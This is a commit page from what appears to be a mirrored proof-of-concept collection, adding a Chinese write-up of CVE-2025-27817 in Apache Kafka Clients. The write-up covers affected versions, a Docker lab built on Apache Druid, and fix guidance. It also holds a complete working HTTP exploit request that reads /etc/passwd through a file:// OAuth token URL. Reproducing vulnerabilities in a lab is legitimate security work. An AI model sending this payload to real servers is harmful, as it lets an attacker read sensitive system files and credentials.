admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-06-20 09:51:08 +00:00
Code Issues Packages Projects Releases Wiki Activity

update CVE-2025-27817

Browse Source
This commit is contained in:
Threekiii 2025-06-16 09:05:49 +08:00
parent a0d54b99d0
commit 0ea0894f44
7 changed files with 581 additions and 471 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
README.md
View File

@ -583,6 +583,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
* Apache HTTPd 路径穿越漏洞 CVE-2021-41773 * Apache HTTPd 路径穿越漏洞 CVE-2021-41773
* Apache HTTPd 路径穿越漏洞 CVE-2021-42013 * Apache HTTPd 路径穿越漏洞 CVE-2021-42013
* Apache Kafka Clients LDAP注入漏洞 CVE-2023-25194 * Apache Kafka Clients LDAP注入漏洞 CVE-2023-25194
* Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817
* Apache Kylin config 未授权配置泄露 CVE-2020-13937 * Apache Kylin config 未授权配置泄露 CVE-2020-13937
* Apache Kylin CubeService.java 命令注入漏洞 CVE-2020-1956 * Apache Kylin CubeService.java 命令注入漏洞 CVE-2020-1956
* Apache Kylin DiagnosisController.java 命令注入漏洞 CVE-2020-13925 * Apache Kylin DiagnosisController.java 命令注入漏洞 CVE-2020-13925
@ -792,6 +793,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
* Apache Commons Configuration 远程命令执行漏洞 CVE-2022-33980 * Apache Commons Configuration 远程命令执行漏洞 CVE-2022-33980
* Apache Commons Text 远程代码执行漏洞 CVE-2022-42889 * Apache Commons Text 远程代码执行漏洞 CVE-2022-42889
* Apache Dubbo Hessian 反序列化漏洞 CVE-2020-1948
* Apache Dubbo Java反序列化漏洞 CVE-2019-17564 * Apache Dubbo Java反序列化漏洞 CVE-2019-17564
* Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518 * Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518
* Apache Flink 目录遍历漏洞 CVE-2020-17519 * Apache Flink 目录遍历漏洞 CVE-2020-17519

108
中间件漏洞/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817.md Normal file
View File

@ -0,0 +1,108 @@
# Apache Kafka Clients 任意文件读取与 SSRF 漏洞 CVE-2025-27817
## 漏洞描述
Apache Kafka 客户端接受用于设置与代理服务器的 `SASL/OAUTHBEARER` 连接的配置数据,包括 `sasl.oauthbearer.token.endpoint.url``sasl.oauthbearer.jwks.endpoint.url`。Apache Kafka 允许客户端读取任意文件并将内容返回到错误日志中或将请求发送到非预期位置。如果在应用程序中Apache Kafka 客户端配置可由不受信任方指定,攻击者可能会使用 `sasl.oauthbearer.token.endpoint.url``sasl.oauthbearer.jwks.endpoint.url` 配置读取磁盘和环境变量中的任意内容,或向非预期位置发出请求。
参考链接:
- https://www.openwall.com/lists/oss-security/2025/06/09/1
- https://kafka.apache.org/cve-list
- https://www.cve.org/CVERecord?id=CVE-2025-27818
## 漏洞影响
```
3.1.0 <= Apache Kafka Client <= 3.9.0
```
## 环境搭建
docker-compose.yml
```
version: '2'
services:
web:
image: vulhub/apache-druid:25.0.0
ports:
- "8888:8888"
```
执行如下命令启动一个 Apache Druid 25.0.0 服务,其内部使用的 kafka-clients 版本是 3.3.1
```
docker-compose up -d
```
服务启动后,访问 `http://your-ip:8888` 即可查看到 Apache Druid 主页。
![](images/Apache%20Kafka%20Clients%20任意文件读取与SSRF%20漏洞%20CVE-2025-27817/image-20250613161826759.png)
## 漏洞复现
读取 `/etc/passwd`
```
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: your-ip:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: */*
Referer: http://your-ip:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Content-Type: application/json
{
"type": "kafka",
"spec": {
"type": "kafka",
"ioConfig": {
"type": "kafka",
"consumerProperties": {
"bootstrap.servers": "127.0.0.1:6666",
"sasl.mechanism": "OAUTHBEARER",
"security.protocol": "SASL_SSL",
"sasl.login.callback.handler.class": "org.apache.kafka.common.security.oauthbearer.secured.OAuthBearerLoginCallbackHandler",
"sasl.oauthbearer.token.endpoint.url": "file:///etc/passwd",
"sasl.jaas.config": "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required sasl.oauthbearer.token.endpoint.url=\"http://127.0.0.1:9999/token\" sasl.oauthbearer.jwks.endpoint.url=\"http://127.0.0.1:9999/jwks\" sasl.oauthbearer.client.id=your-client-id sasl.oauthbearer.client.secret=your-client-secret sasl.oauthbearer.expected.audience=kafka sasl.oauthbearer.expected.issuer=\"http://127.0.0.1:9999\" useFirstPass=true serviceName=kafka debug=true;"
},
"topic": "test",
"useEarliestOffset": true,
"inputFormat": {
"type": "regex",
"pattern": "([\\s\\S]*)",
"listDelimiter": "",
"columns": ["raw"]
}
},
"dataSchema": {
"dataSource": "sample",
"timestampSpec": {
"column": "!!!_no_such_column_!!!",
"missingValue": "1970-01-01T00:00:00Z"
},
"dimensionsSpec": {},
"granularitySpec": {
"rollup": false
}
},
"tuningConfig": {
"type": "kafka"
}
},
"samplerConfig": {
"numRows": 500,
"timeoutMs": 15000
}
}
```
![](images/Apache%20Kafka%20Clients%20任意文件读取与SSRF%20漏洞%20CVE-2025-27817/image-20250613162007132.png)
## 漏洞修复
更新至最新版本。自 Apache Kafka 3.9.1/4.0.0 版本起,添加了一个系统属性 `-Dorg.apache.kafka.sasl.oauthbearer.allowed.urls`,用于在 SASL JAAS 配置中设置允许的 URL。
- 在 3.9.1 版本中,为了向后兼容,它默认接受所有 URL。
- 在 4.0.0 及更新版本中,默认值为空列表,用户必须明确设置允许的 URL。

BIN
中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613161826759.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 195 KiB

BIN
中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613162007132.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 724 KiB